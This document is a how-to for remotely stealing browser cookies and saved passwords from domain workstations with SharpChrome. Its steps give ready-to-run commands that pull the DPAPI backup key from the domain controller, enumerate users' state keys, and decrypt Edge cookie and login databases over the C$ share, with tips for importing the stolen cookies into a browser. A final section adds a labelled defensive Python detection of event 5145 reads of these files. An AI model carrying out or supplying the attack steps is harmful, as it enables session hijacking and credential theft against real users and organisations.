Remotely retrieve cookies from another computer

1. Retrieve the DPAPI backup key from the DC.

This command must be run as a Domain Admin or other privileged domain account:

sharpchrome backupkey /nowrap /server:<DOMAIN CONTROLLER>

2. List statekeys/user profile UNC paths on the target host.

  • Replace <BACKUP KEY> with the Base64 key data you received from the previous command.
  • Replace <WORKSTATION ADDRESS> with the address/hostname of the workstation you are targeting.

sharpchrome statekeys /pvk:<BACKUP KEY> /server:<WORKSTATION ADDRESS>

3. Retrieve cookies from a target user.

Select a state key & UNC path pair from the previous command output.

Replace Local State in the UNC path with Network\Cookies.

  • This is the location of the SQLite database where the user’s browser cookies are stored.
  • Example:
    • \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Local State
    • Becomes: \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Fill in the blanks in the command below:

  • <WORKSTATION ADDRESS> - The workstation you want to retrieve cookies from.
  • <STATE KEY> - The target state key output by the previous command.
  • <UNC PATH> - The UNC path to the Cookies file (explained in the previous step).

sharpchrome cookies /pvk:<BACKUP KEY> /server:<WORKSTATION ADDRESS> /format:json /statekey:<STATE KEY> /target:<UNC PATH>

Run the command to receive cookies.

  • JSON-formatted cookies can be imported into your browser with the Cookiebro add-on.

4. Retrieve saved passwords from a target user.

Select a target state key & UNC path pair.

Replace Local State in the UNC path with Login Data.

  • This is the location of the SQLite database where the user’s saved logins are stored.
  • Example:
    • \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Local State
    • Becomes: \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Fill in the blanks in the command below:

  • <WORKSTATION ADDRESS> - The workstation you want to retrieve saved passwords from.
  • <STATE KEY> - The target state key output by the previous command.
  • <UNC PATH> - The UNC path to the Login Data file (explained in the previous step).

sharpchrome logins /pvk:<BACKUP KEY> /server:<WORKSTATION ADDRESS> /statekey:<STATE KEY> /target:<UNC PATH>
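
From the defender's side, steps 2 to 4 read Local State, Network\Cookies and Login Data over an administrative share, which Security event 5145 records when detailed file share auditing is enabled on the workstation. The detection below is an added example, not part of the original page or of SharpChrome; it assumes events exported as dictionaries using the 5145 field names, and the helper _ev, the severity labels and all sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Files the procedure reads: the state key source and the two SQLite stores.
STORE_RE = re.compile(
    r"^Users\\(?P<owner>[^\\]+)\\AppData\\Local\\.+\\User Data\\"
    r"(?:[^\\]+\\)?(?P<store>Local State|Network\\Cookies|Login Data)$",
    re.IGNORECASE,
)

def find_remote_store_reads(events):
    """Group admin-share reads of Chromium credential files by source,
    account and profile owner, and grade each group."""
    hits = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 5145:
            continue
        if not ev.get("ShareName", "").endswith("$"):
            continue  # only administrative shares such as C$
        m = STORE_RE.match(ev.get("RelativeTargetName", ""))
        if m:
            key = (ev["IpAddress"], ev["SubjectUserName"].lower(),
                   m.group("owner").lower())
            hits[key].add(m.group("store").lower())
    findings = []
    for (ip, account, owner), stores in sorted(hits.items()):
        secrets = stores - {"local state"}
        # high: key material plus a secret store, read by a different account
        high = bool(secrets) and "local state" in stores and account != owner
        findings.append({"source": ip, "account": account,
                         "profile_owner": owner, "stores": sorted(stores),
                         "severity": "high" if high else "review"})
    return findings

def _ev(ip, user, target):  # hypothetical helper that builds a sample event
    return {"EventID": 5145, "IpAddress": ip, "SubjectUserName": user,
            "ShareName": r"\\*\C$", "RelativeTargetName": target}

_EDGE = r"Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default"
# Constructed sample events; field names follow Security event 5145.
SAMPLE_EVENTS = [
    _ev("10.0.0.50", "da-admin", _EDGE + r"\Local State"),
    _ev("10.0.0.50", "da-admin", _EDGE + r"\Network\Cookies"),
    _ev("10.0.0.50", "da-admin", _EDGE + r"\Login Data"),
    _ev("10.0.0.7", "backupsvc", r"Users\jsmith\Documents\report.docx"),
    _ev("10.0.0.9", "jsmith", _EDGE + r"\Local State"),
]
```

A "high" finding means one source read both the key material and a secret store from another user's profile, which matches the sequence in the steps above; a "review" finding is a partial match that needs context.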